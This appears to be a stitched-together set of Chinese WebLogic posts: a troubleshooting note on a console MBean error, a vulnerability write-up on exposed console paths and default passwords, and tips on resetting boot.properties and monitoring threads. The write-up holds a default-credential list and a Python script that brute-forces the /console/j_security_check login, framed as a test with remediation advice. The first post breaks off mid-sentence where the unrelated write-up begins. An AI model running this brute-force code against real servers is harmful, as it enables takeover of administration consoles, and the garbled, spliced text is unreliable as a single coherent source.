有套应用环境，weblogic控制台端口号是7010，浏览器登录后报错：

已禁用所需的Mbean服务器，这将阻止weblogic管理控制台的正常操作

请在该域的配置中启用DomainRuntimeMBean服务器和Edit MBean服务器

由于自身对weblogic也不熟悉，看报错的意思，下意识觉得是不是哪个地方禁用了这个什么MBean，鼓弄了半天也没搞定。

通常weblogic控制台都是用的默认的7001端口，感觉是不是由于换了端口导致的。

一直盯着startWeblogic.sh和setDomain.sh这两个文件看，也没看出个什么鬼来，无奈之下，把目光放到了startManagedweblogic.sh上，开头便看到：

ADMIN_URL=“http://zhglapp1:7010”

看了其它几台weblogic控制台正常的服务器，也都是用的主机名，权当无奈之举，改成了：

ADMIN_URL=“http://127.0.0.1:7010”

嘿嘿，竟然好了

-------------------------------------------

问我原因，暂时也搞不明白。简单复盘一下，其实对于这样的问题，很多时候会被错误信息误导以及把问题想的复杂了。以我这边的开发人员的水平，绝大多数停留在简单使用weblogic的层面，日常部署个程序啥的，不会修改过于复杂的东西。

如果从这个角度出发，就说明

Weblogic_控制台路径泄露
1 漏洞概述
1.1 基础知识
1.2 漏洞概述
2 漏洞原理分析
3 漏洞复现
3.1 环境搭建
3.2 漏洞利用
4 漏洞修复
5 其他

1 漏洞概述
1.1 基础知识
要了解这个漏洞首先我们要了解一个概念，什么是web服务器控制台，它有什么作用和影响：

对于weblogic控制台来讲：Weblogic有一个Web端的管理控制台，关于Weblogic的操作、Web服务的配置及程序管理等都可以通过这个控制台进行操作。


1.2 漏洞概述
由于各种web中间件默认路径可能都存在控制台页面路径泄露的情况，这就是我们的一个攻击面，一旦我们可以获取到这个控制台权限，我们就可以对网站进行一些高危操作。


风险等级：
【高危】：可访问默认中间件控制台，且能过成功获取 shell。
【中危】：可访问默认中间件控制台，并成功登录，但无法获取 shell。
【低危】：可访问默认中间件控制台，但无法登录且无法执行危险操作。
2 漏洞原理分析
1：如果产品部署了控制台功能，并且模块路径为默认路径，就存在控制台路径的泄露问题。

Weblogic控制台默认路径：http://127.0.0.1:7001/console/login/LoginForm.jsp
2：如果控制台的页面账户密码为默认账户名和密码，则存在弱口令的问题。

Welogic默认账户名和密码：WebLogic’, ‘weblogic’, ‘Oracle@123’, ‘password’, ‘system’, ‘Administrator’, ‘admin’, ‘security’, ‘joe’, ‘wlcsystem’, ‘wlpisystem’
3 漏洞复现
通过上述分析，我们发现可以通过探访web服务器控制台界面的默认路径，来查看是否开启了这个控制台页面，如果存在，我们再进行默认密码爆破。
3.1 环境搭建
两种方式：1：下载weblogic jar包安装   2：使用dockers镜像
Weblogic版本：10.3.6(11g)
3.2 漏洞利用
Step1：手动登录或使用脚本探索weblogic控制台默认路径
1：方式一：手动登录：

http://127.0.0.1:7001/console/login/LoginForm.jsp



2：方式二：使用脚本：



Step2：对账户密码进行爆破
方式一：使用脚本进行爆破
 def weakPasswd(self):
        """weak password"""

        pwddict = ['WebLogic', 'weblogic', 'Oracle@123', 'password', 'system', 'Administrator', 'admin', 'security', 'joe', 'wlcsystem', 'wlpisystem']
        for user in pwddict:
            for pwd in pwddict:
                data = {
                    'j_username':user,
                    'j_password':pwd,
                    'j_character_encoding':'UTF-8'
                }
                req = requests.post(self.url+':7001/console/j_security_check', data=data, allow_redirects=False, verify=False)

                if req.status_code == 302 and 'console' in req.text and 'LoginForm.jsp' not in req.text:
                    print('[+] WebLogic username: '+user+'  password: '+pwd)

方式二：使用burpsuite进行密码爆破
4 漏洞修复
1：如果远程部署功能的确需要，建议修改默认的模块名称。

2：修改控制台密码
5 其他
这个控制台密码的加密方式为weblogic密码使用AES（老版本3DES）加密，对称加密可解密，只需要找到用户的密文与加密时的密钥即可；则会部分我们后续再进行操作

有时候启动weblogic服务闪退，不知道是什么原因，可以在cmd中启动服务，会显示报错信息。



原因：这次报错是因为上次服务启动后，在控制台中改了weblogic的密码，隔天启动服务后，出现了此错误。

一开始以为是jdk有问题，检查了一次发现并没有问题，便到日志中查看错误信息。发现weblogic的用户名/密码验证出现了问题。


解决方法：清空当前配置文件中的用户名密码，并重新设置他们；

修改文件时，请先做好备份工作


修改boot.properties，把username/password后面的内容都删掉；

所在路径：

/home/weblogic/Oracle/Middleware/user_projects/domains/mydomain/servers/AdminServer/security

删掉后重新启动服务即可。


参考：https://blog.csdn.net/qq_36501591/article/details/79992690

   连接池占满比然后会有数据库连接泄露或者未释放。如果一句一句去找哪个sql出了问题是比较麻烦的特别是在别人的代码上找，这个时候可以点击Weblogic控制台，进入环境-----服务器选择服务  点击监视线程,可以看到什么类型的请求请求地址没有释放线程异常再去找代码会轻松很多